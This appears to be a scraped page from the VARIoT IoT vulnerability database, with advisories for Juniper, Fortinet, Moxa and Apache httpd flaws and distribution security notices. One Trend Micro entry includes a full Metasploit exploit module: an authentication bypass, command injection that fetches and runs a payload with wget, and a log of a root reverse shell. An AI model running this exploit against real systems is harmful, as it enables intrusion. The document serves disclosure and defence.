VARIoT IoT vulnerabilities database

A vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an unauthenticated, unprivileged, network-based attacker to cause various denials of services leading to targeted information disclosure, modification of any component of the NorthStar system, including managed systems, and full denial of services to any systems under management which NorthStar interacts with using read-only or read-write credentials. Juniper Networks NorthStar Controller Applications have vulnerabilities related to authorization, permissions, and access control.Information is obtained, tampered with, and disrupted by network-based attackers (DoS) An attack may be carried out. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. Permissions and access control vulnerabilities existed in versions prior to JuniperNetworksNorthStarControllerApplication2.1.0ServicePack1. An attacker could exploit the vulnerability to cause a denial of service and change components on the NorthStar system. Versions prior to Juniper NorthStar Controller Application 2.1.0 Service Pack 1 are vulnerable

A denial of service vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1, may allow an authenticated user to cause widespread denials of service to system services by consuming TCP and UDP ports which are normally reserved for other system services. Juniper NorthStar Controller Application is prone to a local denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition. The controller optimizes a service provider's transport network by establishing open industry-standard protocols

A denial of service vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an authenticated malicious user to consume large amounts of system resources leading to a cascading denial of services. Juniper NorthStar Controller Application is prone to a local denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, resulting in denial-of-service condition. The controller optimizes a service provider's transport network by establishing open industry-standard protocols

A command execution flaw on the Trend Micro Threat Discovery Appliance 2.6.1062r1 exists with the timezone parameter in the admin_sys_time.cgi interface. TrendMicroThreatDiscoveryAppliance is the next generation network monitoring device. The TrendMicroThreatDiscoveryApplianceadmin_sys_time.cgi interface handles security holes in the timezone parameter. A remote attacker can exploit a vulnerability to submit a special request to execute arbitrary commands. The first is an authentication bypass vulnerability via a file delete in logoff.cgi which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). Note: You have the option to use the authentication bypass or not since it requires that the server is rebooted. The password reset will render the authentication useless. Typically, if an administrator cant login, they will bounce the box. Therefore, this module performs a heart beat request until the box is bounced and then attempts to login and to perform the command injection. This module has been tested on version 2.6.1062r1 of the appliance. }, 'Author' => [ 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf 'Roberto Suggi Liverani @malerisch', # vuln + msf ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://asciinema.org/a/112480'], # demo [ 'CVE', '2016-7552'], # auth bypass [ 'CVE', '2016-7547'], # cmdi ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Privileged' => true, 'Payload' => { 'DisableNops' => true, }, 'Targets' => [ [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 10 2017')) register_options( [ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'The target URI', '/']), OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']), OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]), ], self.class) end def check if do_login res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'), 'cookie' => @cookie, 'method' => 'GET', }, 1) if res and res.code == 200 and res.body =~ /About Trend Micro/ version = "#{$1}" if res.body =~ /var ver_str = new String\("(.*)"\)/ case version when /2.6.1062/ return Exploit::CheckCode::Vulnerable end end end return Exploit::CheckCode::Safe end def exploit if datastore['AUTHBYPASS'] print_status("Bypassing authentication...") if reset_password print_good("The password has been reset!") print_status("Waiting for the administrator to reboot...") pwn_after_reboot end else if do_login pwn else fail_with(Failure::NoAccess, "Authentication failed") end end end def reset_password c = "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'), 'method' => 'GET', 'cookie' => c, }) if res and res.code == 200 and res.headers.to_s =~ /Backtrace/ return true end return false end def pwn start_http_server print_good("Logged in") download_exec end def pwn_after_reboot @rebooted = false while !@rebooted if do_login @rebooted = true pwn end end end def on_request_uri(cli, request) if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end def start_http_server @pl = generate_payload_exe @elf_sent = false downfile = rand_text_alpha(8+rand(8)) resource_uri = '/' + downfile # do not use SSL for the attacking web server if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri service_url_payload = srv_host + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore connect end def exec(cmd) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'), 'cookie' => @cookie, 'method' => 'POST', 'vars_post' => { 'act' => 'save', 'timezone' => cmd, } }, 1) end def download_exec @bd = rand_text_alpha(8+rand(8)) register_file_for_cleanup("/tmp/#{@bd}") exec("|`wget #{@service_url} -O /tmp/#{@bd}`") exec("|`chmod 755 /tmp/#{@bd}`") exec("|`/tmp/#{@bd}`") # we need to delay, for the stager select(nil, nil, nil, 5) end def do_login begin login = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'), 'method' => 'POST', 'vars_post' => { 'passwd' => datastore['PASSWORD'], 'isCookieEnable' => 1, } }) # these are needed due to the reboot rescue Rex::ConnectionRefused return false rescue Rex::ConnectionTimeout return false end if login and login.code == 200 and login.body =~ /frame\.cgi/ @cookie = "session_id=#{$1};" if login.get_cookies =~ /session_id=(.*);/ return true end return false end end =begin saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc [*] Processing scripts/trend.rc for ERB directives. resource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi resource (scripts/trend.rc)> set RHOST 192.168.100.2 RHOST => 192.168.100.2 resource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp resource (scripts/trend.rc)> set LHOST 192.168.100.13 LHOST => 192.168.100.13 resource (scripts/trend.rc)> exploit [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.100.13:4444 [*] Bypassing authentication... msf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > [+] The password has been reset! [*] Waiting for the reboot... [*] 192.168.100.2:443 - Starting up our web service on http://192.168.100.13:1337/nnDBuOUMuKnxP ... [*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP [*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP [+] Logged in [*] 192.168.100.2:443 - Sending the payload to the server... [*] Transmitting intermediate stager for over-sized stage...(105 bytes) [*] Sending stage (1495599 bytes) to 192.168.100.2 [*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500 [+] Deleted /tmp/rpNDXQZTB [*] Server stopped. msf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 3846 created. Channel 1 created. BusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. /bin/sh: can't access tty; job control turned off /opt/TrendMicro/MinorityReport/www/cgi-bin # id id uid=0(root) gid=0(root) /opt/TrendMicro/MinorityReport/www/cgi-bin # =end

A buffer overflow vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an authenticated malicious user to cause a buffer overflow leading to a denial of service. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. An attacker could exploit the vulnerability to cause a denial of service. Juniper NorthStar Controller Application is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to crash the affected application, resulting in denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed

A buffer overflow vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an authenticated malicious user to cause a buffer overflow leading to a denial of service. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. An attacker could exploit the vulnerability to cause a denial of service. Successful exploits may allow an attacker to execute arbitrary code or cause denial-of-service conditions

A command injection vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow a network-based malicious attacker to cause a denial of service condition. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. A command injection vulnerability exists in versions prior to JuniperNetworksNorthStarControllerApplication2.1.0ServicePack1

A denial of service vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow a malicious attacker crafting packets destined to the device to cause a persistent denial of service to the path computation server service. (DoS) There is a possibility of being put into a state. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol

An escalation of privilege vulnerability in Fortinet FortiWLC-SD versions 8.2.4 and below allows attacker to gain root access via the CLI command 'copy running-config'. FortinetFortiWLC-SD is an unlimited router product from Fortinet. There is a privilege elevation vulnerability in FortinetFortiWLC-SD. Fortinet FortiWLC-SD is prone to a privilege-escalation vulnerability. Fortinet FortiWLC-SD 8.2.4 and prior versions are vulnerable. Fortinet FortiWLC-SD is a wireless LAN controller from Fortinet

A vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an unauthenticated, unprivileged, network-based attacker to cause various system services partial to full denials of services, modification of system states and files, and potential disclosure of sensitive information which may assist the attacker in further attacks on the system through the use of multiple attack vectors, including man-in-the-middle attacks, file injections, and malicious execution of commands causing out of bound memory conditions leading to other attacks. Juniper Networks NorthStar Controller Applications have vulnerabilities related to authorization, permissions, and access control.Information is obtained, tampered with, and disrupted by network-based attackers (DoS) An attack may be carried out. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. A remote privilege elevation vulnerability exists in versions prior to JuniperNetworksNorthStarControllerApplication2.1.0ServicePack1. An attacker could exploit the vulnerability to gain elevated privileges. Versions prior to Juniper NorthStar Controller Application 2.1.0 Service Pack 1 are vulnerable

An exploitable Cleartext Transmission of Password vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. The Change Password functionality of the Web Application transmits the password in cleartext. An attacker capable of intercepting this traffic is able to obtain valid credentials. Moxa AWK-3131A Wireless AP Contains a vulnerability related to the password management function.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. MoxaAWK-3131AWirelessAccessPoint is a wireless switch from China's Moxa. WebApplication is one of the web application modules. A security vulnerability exists in the WebApplication feature in MoxaAWK-3131AWirelessAccessPoint using version 1.1 firmware, which is caused by the program transmitting passwords in clear text

An exploitable Cross-Site Request Forgery vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted form can trick a client into making an unintentional request to the web server which will be treated as an authentic request. MoxaAWK-3131AWirelessAccessPoint is a wireless switch from China's Moxa. A remote attacker could exploit this vulnerability to perform unauthorized operations

An exploitable reflected Cross-Site Scripting vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim. Moxa AWK-3131A Wireless AP Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. MoxaAWK-3131AWirelessAccessPoint is a wireless switch from China's Moxa. WebApplication is one of the web application modules

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime can read one byte past the end of a buffer when sending a malicious Content-Type response header. Apache httpd Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Apache HTTP Server is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to cause denial-of-service conditions. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed. The following versions are vulnerable: Apache HTTP Server 2.2.0 to 2.2.32 Apache HTTP Server 2.4.0 to 2.4.25. =========================================================================== Ubuntu Security Notice USN-3340-1 June 26, 2017 apache2 vulnerabilities =========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 17.04 - Ubuntu 16.10 - Ubuntu 16.04 LTS - Ubuntu 14.04 LTS Summary: Several security issues were fixed in Apache HTTP Server. This update adds a new ap_get_basic_auth_components() function for use by third-party modules. (CVE-2017-3167) Vasileios Panopoulos discovered that the Apache mod_ssl module may crash when third-party modules call ap_hook_process_connection() during an HTTP request to an HTTPS port. (CVE-2017-3169) Javier Jim=C3=A9nez discovered that the Apache HTTP Server incorrectly handled parsing certain requests. (CVE-2017-7679) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 17.04: apache2-bin 2.4.25-3ubuntu2.1 Ubuntu 16.10: apache2-bin 2.4.18-2ubuntu4.2 Ubuntu 16.04 LTS: apache2-bin 2.4.18-2ubuntu3.3 Ubuntu 14.04 LTS: apache2-bin 2.4.7-1ubuntu4.16 In general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201710-32 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Apache: Multiple vulnerabilities Date: October 29, 2017 Bugs: #622240, #624868, #631308 ID: 201710-32 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Apache, the worst of which may result in the loss of secrets. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-servers/apache < 2.4.27-r1 >= 2.4.27-r1 Description =========== Multiple vulnerabilities have been discovered in Apache. Please review the referenced CVE identifiers for details. Impact ====== The Optionsbleed vulnerability can leak arbitrary memory from the server process that may contain secrets. Workaround ========== There is no known workaround at this time. Resolution ========== All Apache users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/apache-2.4.27-r1" References ========== [ 1 ] CVE-2017-3167 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3167 [ 2 ] CVE-2017-3169 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3169 [ 3 ] CVE-2017-7659 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7659 [ 4 ] CVE-2017-7668 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7668 [ 5 ] CVE-2017-7679 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7679 [ 6 ] CVE-2017-9788 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-9788 [ 7 ] CVE-2017-9789 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-9789 [ 8 ] CVE-2017-9798 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9798 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201710-32 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: httpd security update Advisory ID: RHSA-2017:2479-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2017:2479 Issue date: 2017-08-15 CVE Names: CVE-2017-3167 CVE-2017-3169 CVE-2017-7668 CVE-2017-7679 CVE-2017-9788 ===================================================================== 1. Summary: An update for httpd is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 3. Security Fix(es): * It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788) * It was discovered that the use of httpd's ap_get_basic_auth_pw() API function outside of the authentication phase could lead to authentication bypass. A remote attacker could possibly use this flaw to bypass required authentication if the API was used incorrectly by one of the modules used by httpd. (CVE-2017-3167) * A NULL pointer dereference flaw was found in the httpd's mod_ssl module. A remote attacker could use this flaw to cause an httpd child process to crash if another module used by httpd called a certain API function during the processing of an HTTPS request. (CVE-2017-3169) * A buffer over-read flaw was found in the httpd's ap_find_token() function. A remote attacker could use this flaw to cause httpd child process to crash via a specially crafted HTTP request. (CVE-2017-7668) * A buffer over-read flaw was found in the httpd's mod_mime module. A user permitted to modify httpd's MIME configuration could use this flaw to cause httpd child process to crash. (CVE-2017-7679) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing the updated packages, the httpd daemon will be restarted automatically. 5. Bugs fixed (https://bugzilla.redhat.com/): 1463194 - CVE-2017-3167 httpd: ap_get_basic_auth_pw() authentication bypass 1463197 - CVE-2017-3169 httpd: mod_ssl NULL pointer dereference 1463205 - CVE-2017-7668 httpd: ap_find_token() buffer overread 1463207 - CVE-2017-7679 httpd: mod_mime buffer overread 1470748 - CVE-2017-9788 httpd: Uninitialized memory reflection in mod_auth_digest 6. Package List: Red Hat Enterprise Linux Client Optional (v. 7): Source: httpd-2.4.6-67.el7_4.2.src.rpm noarch: httpd-manual-2.4.6-67.el7_4.2.noarch.rpm x86_64: httpd-2.4.6-67.el7_4.2.x86_64.rpm httpd-debuginfo-2.4.6-67.el7_4.2.x86_64.rpm httpd-devel-2.4.6-67.el7_4.2.x86_64.rpm httpd-tools-2.4.6-67.el7_4.2.x86_64.rpm mod_ldap-2.4.6-67.el7_4.2.x86_64.rpm mod_proxy_html-2.4.6-67.el7_4.2.x86_64.rpm mod_session-2.4.6-67.el7_4.2.x86_64.rpm mod_ssl-2.4.6-67.el7_4.2.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): Source: httpd-2.4.6-67.el7_4.2.src.rpm noarch: httpd-manual-2.4.6-67.el7_4.2.noarch.rpm x86_64: httpd-2.4.6-67.el7_4.2.x86_64.rpm httpd-debuginfo-2.4.6-67.el7_4.2.x86_64.rpm httpd-devel-2.4.6-67.el7_4.2.x86_64.rpm httpd-tools-2.4.6-67.el7_4.2.x86_64.rpm mod_ldap-2.4.6-67.el7_4.2.x86_64.rpm mod_proxy_html-2.4.6-67.el7_4.2.x86_64.rpm mod_session-2.4.6-67.el7_4.2.x86_64.rpm mod_ssl-2.4.6-67.el7_4.2.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: httpd-2.4.6-67.el7_4.2.src.rpm aarch64: httpd-2.4.6-67.el7_4.2.aarch64.rpm httpd-debuginfo-2.4.6-67.el7_4.2.aarch64.rpm httpd-devel-2.4.6-67.el7_4.2.aarch64.rpm httpd-tools-2.4.6-67.el7_4.2.aarch64.rpm mod_session-2.4.6-67.el7_4.2.aarch64.rpm mod_ssl-2.4.6-67.el7_4.2.aarch64.rpm noarch: httpd-manual-2.4.6-67.el7_4.2.noarch.rpm ppc64: httpd-2.4.6-67.el7_4.2.ppc64.rpm httpd-debuginfo-2.4.6-67.el7_4.2.ppc64.rpm httpd-devel-2.4.6-67.el7_4.2.ppc64.rpm httpd-tools-2.4.6-67.el7_4.2.ppc64.rpm mod_session-2.4.6-67.el7_4.2.ppc64.rpm mod_ssl-2.4.6-67.el7_4.2.ppc64.rpm ppc64le: httpd-2.4.6-67.el7_4.2.ppc64le.rpm httpd-debuginfo-2.4.6-67.el7_4.2.ppc64le.rpm httpd-devel-2.4.6-67.el7_4.2.ppc64le.rpm httpd-tools-2.4.6-67.el7_4.2.ppc64le.rpm mod_session-2.4.6-67.el7_4.2.ppc64le.rpm mod_ssl-2.4.6-67.el7_4.2.ppc64le.rpm s390x: httpd-2.4.6-67.el7_4.2.s390x.rpm httpd-debuginfo-2.4.6-67.el7_4.2.s390x.rpm httpd-devel-2.4.6-67.el7_4.2.s390x.rpm httpd-tools-2.4.6-67.el7_4.2.s390x.rpm mod_session-2.4.6-67.el7_4.2.s390x.rpm mod_ssl-2.4.6-67.el7_4.2.s390x.rpm x86_64: httpd-2.4.6-67.el7_4.2.x86_64.rpm httpd-debuginfo-2.4.6-67.el7_4.2.x86_64.rpm httpd-devel-2.4.6-67.el7_4.2.x86_64.rpm httpd-tools-2.4.6-67.el7_4.2.x86_64.rpm mod_session-2.4.6-67.el7_4.2.x86_64.rpm mod_ssl-2.4.6-67.el7_4.2.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): aarch64: httpd-debuginfo-2.4.6-67.el7_4.2.aarch64.rpm mod_ldap-2.4.6-67.el7_4.2.aarch64.rpm mod_proxy_html-2.4.6-67.el7_4.2.aarch64.rpm ppc64: httpd-debuginfo-2.4.6-67.el7_4.2.ppc64.rpm mod_ldap-2.4.6-67.el7_4.2.ppc64.rpm mod_proxy_html-2.4.6-67.el7_4.2.ppc64.rpm ppc64le: httpd-debuginfo-2.4.6-67.el7_4.2.ppc64le.rpm mod_ldap-2.4.6-67.el7_4.2.ppc64le.rpm mod_proxy_html-2.4.6-67.el7_4.2.ppc64le.rpm s390x: httpd-debuginfo-2.4.6-67.el7_4.2.s390x.rpm mod_ldap-2.4.6-67.el7_4.2.s390x.rpm mod_proxy_html-2.4.6-67.el7_4.2.s390x.rpm x86_64: httpd-debuginfo-2.4.6-67.el7_4.2.x86_64.rpm mod_ldap-2.4.6-67.el7_4.2.x86_64.rpm mod_proxy_html-2.4.6-67.el7_4.2.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: httpd-2.4.6-67.el7_4.2.src.rpm noarch: httpd-manual-2.4.6-67.el7_4.2.noarch.rpm x86_64: httpd-2.4.6-67.el7_4.2.x86_64.rpm httpd-debuginfo-2.4.6-67.el7_4.2.x86_64.rpm httpd-devel-2.4.6-67.el7_4.2.x86_64.rpm httpd-tools-2.4.6-67.el7_4.2.x86_64.rpm mod_session-2.4.6-67.el7_4.2.x86_64.rpm mod_ssl-2.4.6-67.el7_4.2.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: httpd-debuginfo-2.4.6-67.el7_4.2.x86_64.rpm mod_ldap-2.4.6-67.el7_4.2.x86_64.rpm mod_proxy_html-2.4.6-67.el7_4.2.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2017-3167 https://access.redhat.com/security/cve/CVE-2017-3169 https://access.redhat.com/security/cve/CVE-2017-7668 https://access.redhat.com/security/cve/CVE-2017-7679 https://access.redhat.com/security/cve/CVE-2017-9788 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFZkz2LXlSAg2UNWIIRAt0MAJ9LvD/FlXeCaSo7hbsOQiUO2TFbFgCghvNu ug98ZOhnKCMkaBhPFLHQSic= =glD9 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Solution: The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files). This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience. This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 3 serves as an update to Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References. Security Fix(es): * An out-of-bounds array dereference was found in apr_time_exp_get(). An attacker could abuse an unvalidated usage of this function to cause a denial of service or potentially lead to data leak. JIRA issues fixed (https://issues.jboss.org/): JBCS-402 - Errata for httpd 2.4.23.SP3 RHEL7 7. 6.7) - i386, noarch, ppc64, s390x, x86_64 3. (CVE-2017-7679) * A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. (CVE-2017-9798) Red Hat would like to thank Hanno BAPck for reporting CVE-2017-9798

On Juniper Networks Junos OS 15.1 releases from 15.1R3 to 15.1R4, 16.1 prior to 16.1R3, on M/MX platforms where Enhanced Subscriber Management for DHCPv6 subscribers is configured, a vulnerability in processing IPv6 ND packets originating from subscribers and destined to M/MX series routers can result in a PFE (Packet Forwarding Engine) hang or crash. Juniper Networks Junos OS Contains an input validation vulnerability.Service operation interruption (DoS) An attack may be carried out. Juniper Junos is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash and hang the affected device, denying service to legitimate users. Juniper Junos OS is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware systems. The operating system provides a secure programming interface and Junos SDK

Juniper Networks devices running affected Junos OS versions may be impacted by the receipt of a crafted BGP UPDATE which can lead to an rpd (routing process daemon) crash and restart. Repeated crashes of the rpd daemon can result in an extended denial of service condition. The affected Junos OS versions are: 15.1 prior to 15.1F2-S15, 15.1F5-S7, 15.1F6-S5, 15.1F7, 15.1R4-S7, 15.1R5-S2, 15.1R6; 15.1X49 prior to 15.1X49-D78, 15.1X49-D80; 15.1X53 prior to 15.1X53-D230, 15.1X53-D63, 15.1X53-D70; 16.1 prior to 16.1R3-S3, 16.1R4; 16.2 prior to 16.2R1-S3, 16.2R2; Releases prior to Junos OS 15.1 are unaffected by this vulnerability. 17.1R1, 17.2R1, and all subsequent releases have a resolution for this vulnerability. Juniper Networks Works with device products Junos OS Contains an input validation vulnerability.Service operation interruption (DoS) An attack may be carried out. Juniper Junos is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash and restart the affected device, denying service to legitimate users. Junos OS in Juniper Networks devices has a security vulnerability

On Juniper Networks EX Series Ethernet Switches running affected Junos OS versions, a vulnerability in IPv6 processing has been discovered that may allow a specially crafted IPv6 Neighbor Discovery (ND) packet destined to an EX Series Ethernet Switch to cause a slow memory leak. A malicious network-based packet flood of these crafted IPv6 NDP packets may eventually lead to resource exhaustion and a denial of service. The affected Junos OS versions are: 12.3 prior to 12.3R12-S4, 12.3R13; 13.3 prior to 13.3R10; 14.1 prior to 14.1R8-S3, 14.1R9; 14.1X53 prior ro 14.1X53-D12, 14.1X53-D40; 14.1X55 prior to 14.1X55-D35; 14.2 prior to 14.2R6-S4, 14.2R7-S6, 14.2R8; 15.1 prior to 15.1R5; 16.1 before 16.1R3; 16.2 before 16.2R1-S3, 16.2R2. 17.1R1 and all subsequent releases have a resolution for this vulnerability. Juniper Junos is prone to a denial-of-service vulnerability. Attackers can exploit this issue to resource exhaustion and crash the affected device, denying service to legitimate users. Junos OS is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware system. The operating system provides a secure programming interface and Junos SDK

On Juniper Networks devices running Junos OS affected versions and with LDP enabled, a specific LDP packet destined to the RE (Routing Engine) will consume a small amount of the memory allocated for the rpd (routing protocol daemon) process. Over time, repeatedly receiving this type of LDP packet(s) will cause the memory to exhaust and the rpd process to crash and restart. It is not possible to free up the memory that has been consumed without restarting the rpd process. This issue affects Junos OS based devices with either IPv4 or IPv6 LDP enabled via the [protocols ldp] configuration (the native IPv6 support for LDP is available in Junos OS 16.1 and higher). The interface on which the packet arrives needs to have LDP enabled. The affected Junos versions are: 13.3 prior to 13.3R10; 14.1 prior to 14.1R8; 14.2 prior to 14.2R7-S6 or 14.2R8; 15.1 prior to 15.1F2-S14, 15.1F6-S4, 15.1F7, 15.1R4-S7, 15.1R5; 15.1X49 before 15.1X49-D70; 15.1X53 before 15.1X53-D230, 15.1X53-D63, 15.1X53-D70; 16.1 before 16.1R2. 16.2R1 and all subsequent releases have a resolution for this vulnerability. Juniper Networks Works with device products Junos OS Contains a resource management vulnerability.Service operation interruption (DoS) An attack may be carried out. Juniper Junos is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash and restart the affected device, denying service to legitimate users. Juniper Junos OS is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware systems. The operating system provides a secure programming interface and Junos 